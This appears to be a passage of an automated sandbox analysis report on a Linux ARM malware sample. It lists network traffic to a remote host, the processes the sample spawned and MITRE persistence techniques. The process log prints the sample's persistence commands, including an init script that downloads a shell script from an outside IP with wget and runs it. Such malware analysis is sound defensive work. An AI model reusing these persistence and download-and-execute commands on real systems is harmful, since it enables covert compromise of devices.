Dec 24, 2024 07:55:25.141920090 CET	38242	44656	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:25.526454926 CET	44656	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:25.690068960 CET	38242	44656	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:26.158696890 CET	38242	44656	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:26.158926964 CET	44656	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:26.527621031 CET	44658	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:26.647464991 CET	38242	44658	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:26.647600889 CET	44658	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:26.647614002 CET	44658	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:26.767410994 CET	38242	44658	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:27.152129889 CET	44658	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:27.316653967 CET	38242	44658	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:27.767548084 CET	38242	44658	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:27.767652988 CET	44658	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:28.153762102 CET	44660	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:28.273504972 CET	38242	44660	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:28.273633957 CET	44660	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:28.273634911 CET	44660	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:28.393376112 CET	38242	44660	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:28.777717113 CET	44660	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:28.944667101 CET	38242	44660	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:29.778825045 CET	44662	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:29.898624897 CET	38242	44662	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:29.898725986 CET	44662	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:29.898797035 CET	44662	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:30.018467903 CET	38242	44662	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:30.402041912 CET	44662	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:30.564788103 CET	38242	44662	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:31.027199030 CET	38242	44662	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:31.027446985 CET	44662	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:31.403177977 CET	44664	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:31.522934914 CET	38242	44664	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:31.523102045 CET	44664	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:31.523139000 CET	44664	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:31.642818928 CET	38242	44664	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:32.026618958 CET	44664	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:32.188689947 CET	38242	44664	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:32.643625975 CET	38242	44664	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:32.643769026 CET	44664	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:33.027991056 CET	44666	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:33.147809982 CET	38242	44666	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:33.147984982 CET	44666	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:33.148082018 CET	44666	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:33.267637968 CET	38242	44666	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:33.653237104 CET	44666	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:33.816634893 CET	38242	44666	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:34.270162106 CET	38242	44666	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:34.270304918 CET	44666	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:34.654927015 CET	44668	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:34.774852991 CET	38242	44668	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:34.775301933 CET	44668	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:34.775302887 CET	44668	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:34.895340919 CET	38242	44668	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:35.279784918 CET	44668	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:35.440690041 CET	38242	44668	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:35.893491030 CET	38242	44668	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:35.893745899 CET	44668	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:36.281493902 CET	44670	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:36.401330948 CET	38242	44670	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:36.401539087 CET	44670	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:36.401627064 CET	44670	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:36.521462917 CET	38242	44670	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:36.906677961 CET	44670	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:37.068867922 CET	38242	44670	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:37.528542042 CET	38242	44670	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:37.528816938 CET	44670	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:37.908288002 CET	44672	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:38.028011084 CET	38242	44672	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:38.028204918 CET	44672	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:38.028204918 CET	44672	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:38.148262978 CET	38242	44672	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:38.533515930 CET	44672	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:38.700994015 CET	38242	44672	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:39.155968904 CET	38242	44672	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:39.156220913 CET	44672	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:39.535233974 CET	44674	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:39.655174017 CET	38242	44674	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:39.655284882 CET	44674	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:39.655474901 CET	44674	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:39.777086973 CET	38242	44674	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:40.160691023 CET	44674	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:40.320837021 CET	38242	44674	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:40.771384001 CET	38242	44674	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:40.771541119 CET	44674	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:41.162322998 CET	44676	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:41.282449961 CET	38242	44676	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:41.282685995 CET	44676	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:41.282685995 CET	44676	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:41.402713060 CET	38242	44676	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:41.788285017 CET	44676	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:41.948760986 CET	38242	44676	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:42.421142101 CET	38242	44676	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:42.421616077 CET	44676	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:42.789602995 CET	44678	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:42.909312963 CET	38242	44678	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:42.909526110 CET	44678	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:42.909526110 CET	44678	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:43.029449940 CET	38242	44678	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:43.413316965 CET	44678	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:43.580842018 CET	38242	44678	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:44.033782005 CET	38242	44678	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:44.033993006 CET	44678	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:44.414983034 CET	44680	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:44.534660101 CET	38242	44680	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:44.534885883 CET	44680	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:44.534885883 CET	44680	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:44.654658079 CET	38242	44680	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:45.040153980 CET	44680	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:45.200845957 CET	38242	44680	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:45.665020943 CET	38242	44680	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:45.665158033 CET	44680	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:46.041608095 CET	44682	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:46.161777973 CET	38242	44682	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:46.162046909 CET	44682	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:46.162046909 CET	44682	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:46.281991959 CET	38242	44682	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:46.668190002 CET	44682	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:46.828912020 CET	38242	44682	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:47.293450117 CET	38242	44682	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:47.293641090 CET	44682	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:47.669589996 CET	44684	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:47.790916920 CET	38242	44684	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:47.791007042 CET	44684	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:47.791052103 CET	44684	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:47.910803080 CET	38242	44684	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:48.294506073 CET	44684	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:48.456737995 CET	38242	44684	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:48.913744926 CET	38242	44684	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:48.913978100 CET	44684	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:49.295645952 CET	44686	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:49.415374994 CET	38242	44686	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:49.415539980 CET	44686	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:49.415764093 CET	44686	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:49.535393953 CET	38242	44686	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:49.921061993 CET	44686	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:50.084738970 CET	38242	44686	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:50.174380064 CET	38242	44660	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:50.174570084 CET	44660	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:50.540885925 CET	38242	44686	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:50.541078091 CET	44686	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:50.922746897 CET	44688	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:51.042784929 CET	38242	44688	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:51.042887926 CET	44688	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:51.042956114 CET	44688	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:51.162921906 CET	38242	44688	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:51.549113035 CET	44688	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:51.716741085 CET	38242	44688	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:52.172591925 CET	38242	44688	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:52.172878981 CET	44688	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:52.550961018 CET	44690	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:52.670573950 CET	38242	44690	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:52.670852900 CET	44690	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:52.670854092 CET	44690	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:52.793761969 CET	38242	44690	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:53.176836967 CET	44690	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:53.336786985 CET	38242	44690	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:53.802896976 CET	38242	44690	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:53.803045034 CET	44690	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:54.178307056 CET	44692	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:54.298096895 CET	38242	44692	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:54.298310041 CET	44692	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:54.298310041 CET	44692	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:54.417974949 CET	38242	44692	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:54.802115917 CET	44692	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:54.964747906 CET	38242	44692	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:55.438199043 CET	38242	44692	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:55.438400984 CET	44692	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:55.803369999 CET	44694	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:55.923188925 CET	38242	44694	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:55.923419952 CET	44694	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:55.923419952 CET	44694	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:56.043013096 CET	38242	44694	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:56.427423954 CET	44694	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:56.592796087 CET	38242	44694	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:57.046176910 CET	38242	44694	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:57.046343088 CET	44694	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:57.428445101 CET	44696	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:57.548023939 CET	38242	44696	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:57.548217058 CET	44696	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:57.548217058 CET	44696	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:57.667958021 CET	38242	44696	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:58.052077055 CET	44696	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:58.216764927 CET	38242	44696	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:58.671839952 CET	38242	44696	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:58.671942949 CET	44696	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:59.053145885 CET	44698	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:59.173010111 CET	38242	44698	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:59.173259974 CET	44698	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:59.173259974 CET	44698	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:59.293111086 CET	38242	44698	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:59.676990986 CET	44698	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:59.840780973 CET	38242	44698	94.156.227.234	192.168.2.13
Dec 24, 2024 07:56:00.293379068 CET	38242	44698	94.156.227.234	192.168.2.13
Dec 24, 2024 07:56:00.293626070 CET	44698	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:56:00.677930117 CET	44700	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:56:00.797677994 CET	38242	44700	94.156.227.234	192.168.2.13
Dec 24, 2024 07:56:00.797800064 CET	44700	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:56:00.797955990 CET	44700	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:56:00.917538881 CET	38242	44700	94.156.227.234	192.168.2.13
Dec 24, 2024 07:56:01.301939964 CET	44700	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:56:01.464838028 CET	38242	44700	94.156.227.234	192.168.2.13
Dec 24, 2024 07:56:01.922476053 CET	38242	44700	94.156.227.234	192.168.2.13
Dec 24, 2024 07:56:01.922610044 CET	44700	38242	192.168.2.13	94.156.227.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 07:53:58.712275028 CET	56533	53	192.168.2.13	1.1.1.1
Dec 24, 2024 07:53:58.712327957 CET	45393	53	192.168.2.13	1.1.1.1
Dec 24, 2024 07:53:58.851428986 CET	53	45393	1.1.1.1	192.168.2.13
Dec 24, 2024 07:53:58.937275887 CET	53	56533	1.1.1.1	192.168.2.13

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 07:53:58.712275028 CET	192.168.2.13	1.1.1.1	0x30d4	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 07:53:58.712327957 CET	192.168.2.13	1.1.1.1	0xf8f	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 07:53:58.937275887 CET	1.1.1.1	192.168.2.13	0x30d4	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false
Dec 24, 2024 07:53:58.937275887 CET	1.1.1.1	192.168.2.13	0x30d4	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: arm.nn-20241224-0652.elf PID: 5409, Parent PID: 5335

General

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	/tmp/arm.nn-20241224-0652.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn-20241224-0652.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn-20241224-0652.elf'\n /tmp/arm.nn-20241224-0652.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn-20241224-0652.elf'\n killall arm.nn-20241224-0652.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn-20241224-0652.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/arm.nn-20241224-0652.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/arm.nn-20241224-0652.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/arm.nn-20241224-0652.elf /etc/rc.d/S99arm.nn-20241224-0652.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/arm.nn-20241224-0652.elf /etc/rc.d/S99arm.nn-20241224-0652.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/tmp/arm.nn-20241224-0652.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	06:53:55
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	06:53:56
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

